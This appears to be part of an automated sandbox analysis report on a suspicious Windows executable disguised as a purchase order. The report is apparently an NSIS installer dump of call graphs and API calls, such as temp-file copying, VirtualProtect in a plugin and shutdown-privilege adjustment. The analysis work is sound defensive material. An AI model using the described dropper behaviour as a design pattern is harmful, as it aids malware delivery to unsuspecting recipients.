4037d2 DeleteFileW 4393->4394 4395 4037df CopyFileW 4394->4395 4401 4037a1 4394->4401 4395->4401 4396 403828 4398 406080 36 API calls 4396->4398 4397 406080 36 API calls 4397->4401 4398->4399 4503 4038d0 4399->4503 4400 4062dc 17 API calls 4400->4401 4401->4393 4401->4396 4401->4397 4401->4400 4402 4058a3 2 API calls 4401->4402 4403 403813 CloseHandle 4401->4403 4402->4401 4403->4401 4404->4329 4405->4331 4407 40654e 5 API calls 4406->4407 4409 40336a 4407->4409 4408 403374 4408->4336 4409->4408 4410 405b8f 3 API calls 4409->4410 4411 40337c 4410->4411 4412 40586e 2 API calls 4411->4412 4413 403382 4412->4413 4515 405ddf 4413->4515 4519 405db0 GetFileAttributesW CreateFileW 4416->4519 4418 402f1d 4437 402f2d 4418->4437 4520 4062ba lstrcpynW 4418->4520 4420 402f43 4421 405bdb 2 API calls 4420->4421 4422 402f49 4421->4422 4521 4062ba lstrcpynW 4422->4521 4424 402f54 GetFileSize 4425 403050 4424->4425 4443 402f6b 4424->4443 4522 402e79 4425->4522 4427 403059 4429 403089 GlobalAlloc 4427->4429 4427->4437 4534 403347 SetFilePointer 4427->4534 4428 403331 ReadFile 4428->4443 4533 403347 SetFilePointer 4429->4533 4431 4030bc 4434 402e79 6 API calls 4431->4434 4433 4030a4 4436 403116 31 API calls 4433->4436 4434->4437 4435 403072 4438 403331 ReadFile 4435->4438 4441 4030b0 4436->4441 4437->4342 4439 40307d 4438->4439 4439->4429 4439->4437 4440 402e79 6 API calls 4440->4443 4441->4437 4441->4441 4442 4030ed SetFilePointer 4441->4442 4442->4437 4443->4425 4443->4428 4443->4431 4443->4437 4443->4440 4445 406694 5 API calls 4444->4445 4446 4039be 4445->4446 4447 4039c4 GetUserDefaultUILanguage 4446->4447 4448 4039d6 4446->4448 4535 406201 wsprintfW 4447->4535 4450 406188 3 API calls 4448->4450 4451 403a06 4450->4451 4453 403a25 lstrcatW 4451->4453 4455 406188 3 API calls 4451->4455 4452 4039d4 4536 403c80 4452->4536 4453->4452 4455->4453 4457 405c97 18 API calls 4458 403a57 4457->4458 4459 403aeb 4458->4459 4461 406188 3 API calls 4458->4461 4460 405c97 18 API calls 4459->4460 4462 403af1 4460->4462 4463 403a89 4461->4463 4464 403b01 LoadImageW 4462->4464 4465 4062dc 17 API calls 4462->4465 4463->4459 4469 403aaa lstrlenW 4463->4469 4472 405bbc CharNextW 4463->4472 4466 403ba7 4464->4466 4467 403b28 RegisterClassW 4464->4467 4465->4464 4468 40140b 2 API calls 4466->4468 4470 403b5e SystemParametersInfoW CreateWindowExW 4467->4470 4499 403bb1 4467->4499 4471 403bad 4468->4471 4473 403ab8 lstrcmpiW 4469->4473 4474 403ade 4469->4474 4470->4466 4479 403c80 18 API calls 4471->4479 4471->4499 4477 403aa7 4472->4477 4473->4474 4475 403ac8 GetFileAttributesW 4473->4475 4476 405b8f 3 API calls 4474->4476 4478 403ad4 4475->4478 4480 403ae4 4476->4480 4477->4469 4478->4474 4481 405bdb 2 API calls 4478->4481 4482 403bbe 4479->4482 4544 4062ba lstrcpynW 4480->4544 4481->4474 4484 403bca ShowWindow 4482->4484 4485 403c4d 4482->4485 4487 406624 3 API calls 4484->4487 4545 4053f5 OleInitialize 4485->4545 4489 403be2 4487->4489 4488 403c53 4490 403c57 4488->4490 4491 403c6f 4488->4491 4492 403bf0 GetClassInfoW 4489->4492 4494 406624 3 API calls 4489->4494 4497 40140b 2 API calls 4490->4497 4490->4499 4493 40140b 2 API calls 4491->4493 4495 403c04 GetClassInfoW RegisterClassW 4492->4495 4496 403c1a DialogBoxParamW 4492->4496 4493->4499 4494->4492 4495->4496 4498 40140b 2 API calls 4496->4498 4497->4499 4498->4499 4499->4399 4500->4348 4501->4379 4502->4386 4504 4038e8 4503->4504 4505 4038da CloseHandle 4503->4505 4563 403915 4504->4563 4505->4504 4508 4059cc 67 API calls 4509 403703 OleUninitialize 4508->4509 4509->4355 4509->4356 4510->4389 4511->4401 4513 401389 2 API calls 4512->4513 4514 401420 4513->4514 4514->4362 4516 405dec GetTickCount GetTempFileNameW 4515->4516 4517 405e22 4516->4517 4518 40338d 4516->4518 4517->4516 4517->4518 4518->4336 4519->4418 4520->4420 4521->4424 4523 402e82 4522->4523 4524 402e9a 4522->4524 4527 402e92 4523->4527 4528 402e8b DestroyWindow 4523->4528 4525 402ea2 4524->4525 4526 402eaa GetTickCount 4524->4526 4529 4066d0 2 API calls 4525->4529 4530 402eb8 CreateDialogParamW ShowWindow 4526->4530 4531 402edb 4526->4531 4527->4427 4528->4527 4532 402ea8 4529->4532 4530->4531 4531->4427 4532->4427 4533->4433 4534->4435 4535->4452 4537 403c94 4536->4537 4552 406201 wsprintfW 4537->4552 4539 403d05 4553 403d39 4539->4553 4541 403a35 4541->4457 4542 403d0a 4542->4541 4543 4062dc 17 API calls 4542->4543 4543->4542 4544->4459 4556 40427d 4545->4556 4547 405418 4551 40543f 4547->4551 4559 401389 4547->4559 4548 40427d SendMessageW 4549 405451 OleUninitialize 4548->4549 4549->4488 4551->4548 4552->4539 4554 4062dc 17 API calls 4553->4554 4555 403d47 SetWindowTextW 4554->4555 4555->4542 4557 404295 4556->4557 4558 404286 SendMessageW 4556->4558 4557->4547 4558->4557 4561 401390 4559->4561 4560 4013fe 4560->4547 4561->4560 4562 4013cb MulDiv SendMessageW 4561->4562 4562->4561 4564 403923 4563->4564 4565 4038ed 4564->4565 4566 403928 FreeLibrary GlobalFree 4564->4566 4565->4508 4566->4565 4566->4566 5422 40190f 5423 402c41 17 API calls 5422->5423 5424 401916 5423->5424 5425 405920 MessageBoxIndirectW 5424->5425 5426 40191f 5425->5426 5427 401491 5428 405322 24 API calls 5427->5428 5429 401498 5428->5429 5430 401d14 5431 402c1f 17 API calls 5430->5431 5432 401d1b 5431->5432 5433 402c1f 17 API calls 5432->5433 5434 401d27 GetDlgItem 5433->5434 5435 402592 5434->5435 4754 405296 4755 4052a6 4754->4755 4756 4052ba 4754->4756 4758 405303 4755->4758 4759 4052ac 4755->4759 4757 4052c2 IsWindowVisible 4756->4757 4766 4052e2 4756->4766 4757->4758 4760 4052cf 4757->4760 4761 405308 CallWindowProcW 4758->4761 4762 40427d SendMessageW 4759->4762 4768 404bec SendMessageW 4760->4768 4764 4052b6 4761->4764 4762->4764 4766->4761 4773 404c6c 4766->4773 4769 404c4b SendMessageW 4768->4769 4770 404c0f GetMessagePos ScreenToClient SendMessageW 4768->4770 4771 404c43 4769->4771 4770->4771 4772 404c48 4770->4772 4771->4766 4772->4769 4782 4062ba lstrcpynW 4773->4782 4775 404c7f 4783 406201 wsprintfW 4775->4783 4777 404c89 4778 40140b 2 API calls 4777->4778 4779 404c92 4778->4779 4784 4062ba lstrcpynW 4779->4784 4781 404c99 4781->4758 4782->4775 4783->4777 4784->4781 4880 73cf2997 4881 73cf29e7 4880->4881 4882 73cf29a7 VirtualProtect 4880->4882 4882->4881 5436 402598 5437 4025c7 5436->5437 5438 4025ac 5436->5438 5440 4025fb 5437->5440 5441 4025cc 5437->5441 5439 402c1f 17 API calls 5438->5439 5446 4025b3 5439->5446 5443 402c41 17 API calls 5440->5443 5442 402c41 17 API calls 5441->5442 5444 4025d3 WideCharToMultiByte lstrlenA 5442->5444 5445 402602 lstrlenW 5443->5445 5444->5446 5445->5446 5447 402645 5446->5447 5449 405e91 5 API calls 5446->5449 5450 40262f 5446->5450 5448 405e62 WriteFile 5448->5447 5449->5450 5450->5447 5450->5448 4889 404c9e GetDlgItem GetDlgItem 4890 404cf0 7 API calls 4889->4890 4898 404f09 4889->4898 4891 404d93 DeleteObject 4890->4891 4892 404d86 SendMessageW 4890->4892 4893 404d9c 4891->4893 4892->4891 4895 404dab 4893->4895 4896 404dd3 4893->4896 4894 404fed 4901 405099 4894->4901 4907 405281 4894->4907 4912 405046 SendMessageW 4894->4912 4897 4062dc 17 API calls 4895->4897 4900 404231 18 API calls 4896->4900 4902 404db5 SendMessageW SendMessageW 4897->4902 4898->4894 4899 404fce 4898->4899 4905 404f69 4898->4905 4899->4894 4909 404fdf SendMessageW 4899->4909 4906 404de7 4900->4906 4903 4050a3 SendMessageW 4901->4903 4904 4050ab 4901->4904 4902->4893 4903->4904 4914 4050c4 4904->4914 4915 4050bd ImageList_Destroy 4904->4915 4923 4050d4 4904->4923 4910 404bec 5 API calls 4905->4910 4911 404231 18 API calls 4906->4911 4908 404298 8 API calls 4907->4908 4913 40528f 4908->4913 4909->4894 4926 404f7a 4910->4926 4927 404df5 4911->4927 4912->4907 4917 40505b SendMessageW 4912->4917 4918 4050cd GlobalFree 4914->4918 4914->4923 4915->4914 4916 405243 4916->4907 4921 405255 ShowWindow GetDlgItem ShowWindow 4916->4921 4920 40506e 4917->4920 4918->4923 4919 404eca GetWindowLongW SetWindowLongW 4922 404ee3 4919->4922 4928 40507f SendMessageW 4920->4928 4921->4907 4924 404f01 4922->4924 4925 404ee9 ShowWindow 4922->4925 4923->4916 4933 404c6c 4 API calls 4923->4933 4937 40510f 4923->4937 4946 404266 SendMessageW 4924->4946 4945 404266 SendMessageW 4925->4945 4926->4899 4927->4919 4929 404ec4 4927->4929 4932 404e45 SendMessageW 4927->4932 4935 404e81 SendMessageW 4927->4935 4936 404e92 SendMessageW 4927->4936 4928->4901 4929->4919 4929->4922 4932->4927 4933->4937 4934 404efc 4934->4907 4935->4927 4936->4927 4939 405153 4937->4939 4940 40513d SendMessageW 4937->4940 4938 405219 InvalidateRect 4938->4916 4941 40522f 4938->4941 4939->4938 4942 4051b4 4939->4942 4944 4051c7 SendMessageW SendMessageW 4939->4944 4940->4939 4947 404ba7 4941->4947 4942->4944 4944->4939 4945->4934 4946->4898 4950 404ade 4947->4950 4949 404bbc 4949->4916 4951 404af7 4950->4951 4952 4062dc 17 API calls 4951->4952 4953 404b5b 4952->4953 4954 4062dc 17 API calls 4953->4954 4955 404b66 4954->4955 4956 4062dc 17 API calls 4955->4956 4957 404b7c lstrlenW wsprintfW SetDlgItemTextW 4956->4957 4957->4949 5451 40149e 5452 4022f7 5451->5452 5453 4014ac PostQuitMessage 5451->5453 5453->5452 5454 401c1f 5455 402c1f 17 API calls 5454->5455 5456 401c26 5455->5456 5457 402c1f 17 API calls 5456->5457 5458 401c33 5457->5458 5459 401c48 5458->5459 5460 402c41 17 API calls 5458->5460 5461 401c58 5459->5461 5464 402c41 17 API calls 5459->5464 5460->5459 5462 401c63 5461->5462 5463 401caf 5461->5463 5465 402c1f 17 API calls 5462->5465 5466 402c41 17 API calls 5463->5466 5464->5461 5467 401c68 5465->5467 5468 401cb4 5466->5468 5469 402c1f 17 API calls 5467->5469 5470 402c41 17 API calls 5468->5470 5471 401c74 5469->5471 5472 401cbd FindWindowExW 5470->5472 5473 401c81 SendMessageTimeoutW 5471->5473 5474 401c9f SendMessageW 5471->5474 5475 401cdf 5472->5475 5473->5475 5474->5475 5476 402aa0 SendMessageW 5477 402aba InvalidateRect 5476->5477 5478 402ac5 5476->5478 5477->5478 5479 402821 5480 402827 5479->5480 5481 402ac5 5480->5481 5482 40282f FindClose 5480->5482 5482->5481 5483 4043a1 lstrlenW 5484 4043c0 5483->5484 5485 4043c2 WideCharToMultiByte 5483->5485 5484->5485 5486 404722 5487 40474e 5486->5487 5488 40475f 5486->5488 5547 405904 GetDlgItemTextW 5487->5547 5490 40476b GetDlgItem 5488->5490 5522 4047ca 5488->5522 5493 40477f 5490->5493 5491 4048ae 5496 404a5d 5491->5496 5549 405904 GetDlgItemTextW 5491->5549 5492 404759 5494 40654e 5 API calls 5492->5494 5495 404793 SetWindowTextW 5493->5495 5499 405c3a 4 API calls 5493->5499 5494->5488 5500 404231 18 API calls 5495->5500 5498 404298 8 API calls 5496->5498 5503 404a71 5498->5503 5504 404789 5499->5504 5505 4047af 5500->5505 5501 4062dc 17 API calls 5506 40483e SHBrowseForFolderW 5501->5506 5502 4048de 5507 405c97 18 API calls 5502->5507 5504->5495 5511 405b8f 3 API calls 5504->5511 5508 404231 18 API calls 5505->5508 5506->5491 5509 404856 CoTaskMemFree 5506->5509 5510 4048e4 5507->5510 5512 4047bd 5508->5512 5513 405b8f 3 API calls 5509->5513 5550 4062ba lstrcpynW 5510->5550 5511->5495 5548 404266 SendMessageW 5512->5548 5515 404863 5513->5515 5518 40489a SetDlgItemTextW 5515->5518 5523 4062dc 17 API calls 5515->5523 5517 4047c3 5520 406694 5 API calls 5517->5520 5518->5491 5519 4048fb 5521 406694 5 API calls 5519->5521 5520->5522 5529 404902 5521->5529 5522->5491 5522->5496 5522->5501 5525 404882 lstrcmpiW 5523->5525 5524 404943 5551 4062ba lstrcpynW 5524->5551 5525->5518 5526 404893 lstrcatW 5525->5526 5526->5518 5528 40494a 5530 405c3a 4 API calls 5528->5530 5529->5524 5534 405bdb 2 API calls 5529->5534 5535 40499b 5529->5535 5531 404950 GetDiskFreeSpaceW 5530->5531 5533 404974 MulDiv 5531->5533 5531->5535 5533->5535 5534->5529 5536 404a0c 5535->5536 5538 404ba7 20 API calls 5535->5538 5537 404a2f 5536->5537 5539 40140b 2 API calls 5536->5539 5552 404253 EnableWindow 5537->5552 5540 4049f9 5538->5540 5539->5537 5542 404a0e SetDlgItemTextW 5540->5542 5543 4049fe 5540->5543 5542->5536 5545 404ade 20 API calls 5543->5545 5544 404a4b 5544->5496 5546 40467b SendMessageW 5544->5546 5545->5536 5546->5496 5547->5492 5548->5517 5549->5502 5550->5519 5551->5528 5552->5544 5553 4015a3 5554 402c41 17 API calls 5553->5554 5555 4015aa SetFileAttributesW 5554->5555 5556 4015bc 5555->5556 5557 401a30 5558 402c41 17 API calls 5557->5558 5559 401a39 ExpandEnvironmentStringsW 5558->5559 5560 401a60 5559->5560 5561 401a4d 5559->5561 5561->5560 5562 401a52 lstrcmpW 5561->5562 5562->5560 4567 402032 4568 402044 4567->4568 4569 4020f6 4567->4569 4570 402c41 17 API calls 4568->4570 4571 401423 24 API calls 4569->4571 4572 40204b 4570->4572 4578 402250 4571->4578 4573 402c41 17 API calls 4572->4573 4574 402054 4573->4574 4575 40206a LoadLibraryExW 4574->4575 4576 40205c GetModuleHandleW 4574->4576 4575->4569 4577 40207b 4575->4577 4576->4575 4576->4577 4590 406703 WideCharToMultiByte 4577->4590 4581 4020c5 4585 405322 24 API calls 4581->4585 4582 40208c 4583 402094 4582->4583 4584 4020ab 4582->4584 4586 401423 24 API calls 4583->4586 4593 73cf177b 4584->4593 4587 40209c 4585->4587 4586->4587 4587->4578 4588 4020e8 FreeLibrary 4587->4588 4588->4578 4591 40672d GetProcAddress 4590->4591 4592 402086 4590->4592 4591->4592 4592->4581 4592->4582 4594 73cf17ae 4593->4594 4633 73cf1b63 4594->4633 4596 73cf17b5 4597 73cf18da 4596->4597 4598 73cf17cd 4596->4598 4599 73cf17c6 4596->4599 4597->4587 4667 73cf2398 4598->4667 4683 73cf2356 4599->4683 4604 73cf1813 4696 73cf256d 4604->4696 4605 73cf1831 4608 73cf1837 4605->4608 4609 73cf1882 4605->4609 4606 73cf17fc 4618 73cf17f2 4606->4618 4693 73cf2d2f 4606->4693 4607 73cf17e3 4611 73cf17e9 4607->4611 4617 73cf17f4 4607->4617 4710 73cf15c6 4608->4710 4615 73cf256d 10 API calls 4609->4615 4611->4618 4677 73cf2a74 4611->4677 4621 73cf1873 4615->4621 4616 73cf1819 4707 73cf1272 4616->4707 4687 73cf2728 4617->4687 4618->4604 4618->4605 4625 73cf18c9 4621->4625 4717 73cf2530 4621->4717 4622 73cf17fa 4622->4618 4623 73cf256d 10 API calls 4623->4621 4625->4597 4627 73cf18d3 GlobalFree 4625->4627 4627->4597 4630 73cf18b5 4630->4625 4721 73cf153d wsprintfW 4630->4721 4631 73cf18ae FreeLibrary 4631->4630 4724 73cf121b GlobalAlloc 4633->4724 4635 73cf1b87 4725 73cf121b GlobalAlloc 4635->4725 4637 73cf1dad GlobalFree GlobalFree GlobalFree 4638 73cf1dca 4637->4638 4654 73cf1e14 4637->4654 4639 73cf2196 4638->4639 4646 73cf1ddf 4638->4646 4638->4654 4641 73cf21b8 GetModuleHandleW 4639->4641 4639->4654 4640 73cf1c68 GlobalAlloc 4662 73cf1b92 4640->4662 4643 73cf21de 4641->4643 4644 73cf21c9 LoadLibraryW 4641->4644 4642 73cf1cd1 GlobalFree 4642->4662 4732 73cf1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4643->4732 4644->4643 4644->4654 4645 73cf1cb3 lstrcpyW 4648 73cf1cbd lstrcpyW 4645->4648 4646->4654 4728 73cf122c 4646->4728 4648->4662 4649 73cf2230 4652 73cf223d lstrlenW 4649->4652 4649->4654 4650 73cf20f0 4650->4654 4660 73cf2138 lstrcpyW 4650->4660 4733 73cf1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4652->4733 4653 73cf2068 4731 73cf121b GlobalAlloc 4653->4731 4654->4596 4655 73cf21f0 4655->4649 4665 73cf221a GetProcAddress 4655->4665 4658 73cf1d0f 4658->4662 4726 73cf158f GlobalSize GlobalAlloc 4658->4726 4659 73cf1fa9 GlobalFree 4659->4662 4660->4654 4661 73cf2257 4661->4654 4662->4637 4662->4640 4662->4642 4662->4645 4662->4648 4662->4650 4662->4653 4662->4654 4662->4658 4662->4659 4664 73cf122c 2 API calls 4662->4664 4664->4662 4665->4649 4666 73cf2071 4666->4596 4673 73cf23b0 4667->4673 4669 73cf24d9 GlobalFree 4670 73cf17d3 4669->4670 4669->4673 4670->4606 4670->4607 4670->4618 4671 73cf2458 GlobalAlloc WideCharToMultiByte 4671->4669 4672 73cf2483 GlobalAlloc 4675 73cf249a 4672->4675 4673->4669 4673->4671 4673->4672 4674 73cf122c GlobalAlloc lstrcpynW 4673->4674 4673->4675 4735 73cf12ba 4673->4735 4674->4673 4675->4669 4739 73cf26bc 4675->4739 4678 73cf2a86 4677->4678 4679 73cf2b2b ReadFile 4678->4679 4680 73cf2b49 4679->4680 4681 73cf2c3a GetLastError 4680->4681 4682 73cf2c45 4680->4682 4681->4682 4682->4618 4684 73cf236b 4683->4684 4685 73cf2376 GlobalAlloc 4684->4685 4686 73cf17cc 4684->4686 4685->4684 4686->4598 4691 73cf2758 4687->4691 4688 73cf2806 4690 73cf280c GlobalSize 4688->4690 4692 73cf2816 4688->4692 4689 73cf27f3 GlobalAlloc 4689->4692 4690->4692 4691->4688 4691->4689 4692->4622 4694 73cf2d3a 4693->4694 4695 73cf2d7a GlobalFree 4694->4695 4742 73cf121b GlobalAlloc 4696->4742 4698 73cf2623 lstrcpynW 4704 73cf2577 4698->4704 4699 73cf2612 StringFromGUID2 4699->4704 4700 73cf25f0 MultiByteToWideChar 4700->4704 4701 73cf2636 wsprintfW 4701->4704 4702 73cf265a GlobalFree 4702->4704 4703 73cf268f GlobalFree 4703->4616 4704->4698 4704->4699 4704->4700 4704->4701 4704->4702 4704->4703 4705 73cf1272 2 API calls 4704->4705 4743 73cf12e1 4704->4743 4705->4704 4708 73cf127b GlobalAlloc lstrcpynW 4707->4708 4709 73cf12b5 GlobalFree 4707->4709 4708->4709 4709->4621 4711 73cf15d6 lstrcpyW 4710->4711 4712 73cf15e4 4710->4712 4715 73cf161d 4711->4715 4712->4711 4713 73cf15f0 4712->4713 4713->4715 4716 73cf160d wsprintfW 4713->4716 4715->4623 4716->4715 4718 73cf253e 4717->4718 4719 73cf1895 4717->4719 4718->4719 4720 73cf255a GlobalFree 4718->4720 4719->4630 4719->4631 4720->4718 4722 73cf1272 2 API calls 4721->4722 4723 73cf155e 4722->4723 4723->4625 4724->4635 4725->4662 4727 73cf15ad 4726->4727 4727->4658 4734 73cf121b GlobalAlloc 4728->4734 4730 73cf123b lstrcpynW 4730->4654 4731->4666 4732->4655 4733->4661 4734->4730 4736 73cf12c1 4735->4736 4737 73cf122c 2 API calls 4736->4737 4738 73cf12df 4737->4738 4738->4673 4740 73cf26ca VirtualAlloc 4739->4740 4741 73cf2720 4739->4741 4740->4741 4741->4675 4742->4704 4744 73cf130c 4743->4744 4745 73cf12ea 4743->4745 4744->4704 4745->4744 4746 73cf12f0 lstrcpyW 4745->4746 4746->4744 5568 73cf103d 5571 73cf101b 5568->5571 5572 73cf1516 GlobalFree 5571->5572 5573 73cf1020 5572->5573 5574 73cf1027 GlobalAlloc 5573->5574 5575 73cf1024 5573->5575 5574->5575 5576 73cf153d 3 API calls 5575->5576 5577 73cf103b 5576->5577 4747 401735 4748 402c41 17 API calls 4747->4748 4749 40173c SearchPathW 4748->4749 4750 4029e6 4749->4750 4751 401757 4749->4751 4751->4750 4753 4062ba lstrcpynW 4751->4753 4753->4750 5578 402a35 5579 402c1f 17 API calls 5578->5579 5580 402a3b 5579->5580 5581 402a72 5580->5581 5583 40288b 5580->5583 5584 402a4d 5580->5584 5582 4062dc 17 API calls 5581->5582 5581->5583 5582->5583 5584->5583 5586 406201 wsprintfW 5584->5586 5586->5583 5587 4014b8 5588 4014be 5587->5588 5589 401389 2 API calls 5588->5589 5590 4014c6 5589->5590 5591 401db9 GetDC 5592 402c1f 17 API calls 5591->5592 5593 401dcb GetDeviceCaps MulDiv ReleaseDC 5592->5593 5594 402c1f 17 API calls 5593->5594 5595 401dfc 5594->5595 5596 4062dc 17 API calls 5595->5596 5597 401e39 CreateFontIndirectW 5596->5597 5598 402592 5597->5598 5599 40283b 5600 402843 5599->5600 5601 402847 FindNextFileW 5600->5601 5602 402859 5600->5602 5601->5602 5603 4029e6 5602->5603 5605 4062ba lstrcpynW 5602->5605 5605->5603

                                            Executed Functions

                                            Function 0040338F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 40338f-4033cc SetErrorMode GetVersion 1 4033ce-4033d6 call 406694 0->1 2 4033df 0->2 1->2 7 4033d8 1->7 4 4033e4-4033f8 call 406624 lstrlenA 2->4 9 4033fa-403416 call 406694 * 3 4->9 7->2 16 403427-403486 #17 OleInitialize SHGetFileInfoW call 4062ba GetCommandLineW call 4062ba 9->16 17 403418-40341e 9->17 24 403490-4034aa call 405bbc CharNextW 16->24 25 403488-40348f 16->25 17->16 21 403420 17->21 21->16 28 4034b0-4034b6 24->28 29 4035c1-4035db GetTempPathW call 40335e 24->29 25->24 30 4034b8-4034bd 28->30 31 4034bf-4034c3 28->31 38 403633-40364d DeleteFileW call 402edd 29->38 39 4035dd-4035fb GetWindowsDirectoryW lstrcatW call 40335e 29->39 30->30 30->31 33 4034c5-4034c9 31->33 34 4034ca-4034ce 31->34 33->34 36 4034d4-4034da 34->36 37 40358d-40359a call 405bbc 34->37 42 4034f5-40352e 36->42 43 4034dc-4034e4 36->43 52 40359c-40359d 37->52 53 40359e-4035a4 37->53 54 403653-403659 38->54 55 4036fe-40370e call 4038d0 OleUninitialize 38->55 39->38 58 4035fd-40362d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40335e 39->58 49 403530-403535 42->49 50 40354b-403585 42->50 47 4034e6-4034e9 43->47 48 4034eb 43->48 47->42 47->48 48->42 49->50 56 403537-40353f 49->56 50->37 57 403587-40358b 50->57 52->53 53->28 61 4035aa 53->61 62 4036ee-4036f5 call 4039aa 54->62 63 40365f-40366a call 405bbc 54->63 75 403834-40383a 55->75 76 403714-403724 call 405920 ExitProcess 55->76 65 403541-403544 56->65 66 403546 56->66 57->37 59 4035ac-4035ba call 4062ba 57->59 58->38 58->55 68 4035bf 59->68 61->68 74 4036fa 62->74 79 4036b8-4036c2 63->79 80 40366c-4036a1 63->80 65->50 65->66 66->50 68->29 74->55 77 4038b8-4038c0 75->77 78 40383c-403852 GetCurrentProcess OpenProcessToken 75->78 85 4038c2 77->85 86 4038c6-4038ca ExitProcess 77->86 82 403854-403882 LookupPrivilegeValueW AdjustTokenPrivileges 78->82 83 403888-403896 call 406694 78->83 87 4036c4-4036d2 call 405c97 79->87 88 40372a-40373e call 40588b lstrcatW 79->88 84 4036a3-4036a7 80->84 82->83 102 4038a4-4038af ExitWindowsEx 83->102 103 403898-4038a2 83->103 93 4036b0-4036b4 84->93 94 4036a9-4036ae 84->94 85->86 87->55 99 4036d4-4036ea call 4062ba * 2 87->99 100 403740-403746 lstrcatW 88->100 101 40374b-403765 lstrcatW lstrcmpiW 88->101 93->84 98 4036b6 93->98 94->93 94->98 98->79 99->62 100->101 101->55 105 403767-40376a 101->105 102->77 106 4038b1-4038b3 call 40140b 102->106 103->102 103->106 108 403773 call 40586e 105->108 109 40376c-403771 call 4057f1 105->109 106->77 117 403778-403786 SetCurrentDirectoryW 108->117 109->117 118 403793-4037bc call 4062ba 117->118 119 403788-40378e call 4062ba 117->119 123 4037c1-4037dd call 4062dc DeleteFileW 118->123 119->118 126 40381e-403826 123->126 127 4037df-4037ef CopyFileW 123->127 126->123 129 403828-40382f call 406080 126->129 127->126 128 4037f1-403811 call 406080 call 4062dc call 4058a3 127->128 128->126 138 403813-40381a CloseHandle 128->138 129->55 138->126
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 004033B2
                                            • GetVersion.KERNEL32 ref: 004033B8
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                            • #17.COMCTL32(?,00000006,?,0000000A), ref: 00403428
                                            • OleInitialize.OLE32(00000000), ref: 0040342F
                                            • SHGetFileInfoW.SHELL32(0042B208,00000000,?,?,00000000), ref: 0040344B
                                            • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 00403460
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,?,00000006,?,0000000A), ref: 00403498
                                              • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,?,?,00403401,0000000A), ref: 004066A6
                                              • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                            • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035D2
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035E3
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035EF
                                            • GetTempPathW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 00403603
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040360B
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 0040361C
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403624
                                            • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 00403638
                                              • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,?,00403460,00433EE0,NSIS Error,?,00000006,?,0000000A), ref: 004062C7
                                            • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 00403703
                                            • ExitProcess.KERNEL32 ref: 00403724
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403737
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403746
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403751
                                            • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",00000000,00000006,?,00000006,?,0000000A), ref: 0040375D
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403779
                                            • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?,?,00000006,?,0000000A), ref: 004037D3
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe,0042AA08,00000001,?,00000006,?,0000000A), ref: 004037E7
                                            • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,?,0000000A), ref: 00403814
                                            • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403843
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                            • ExitProcess.KERNEL32 ref: 004038CA
                                            Strings
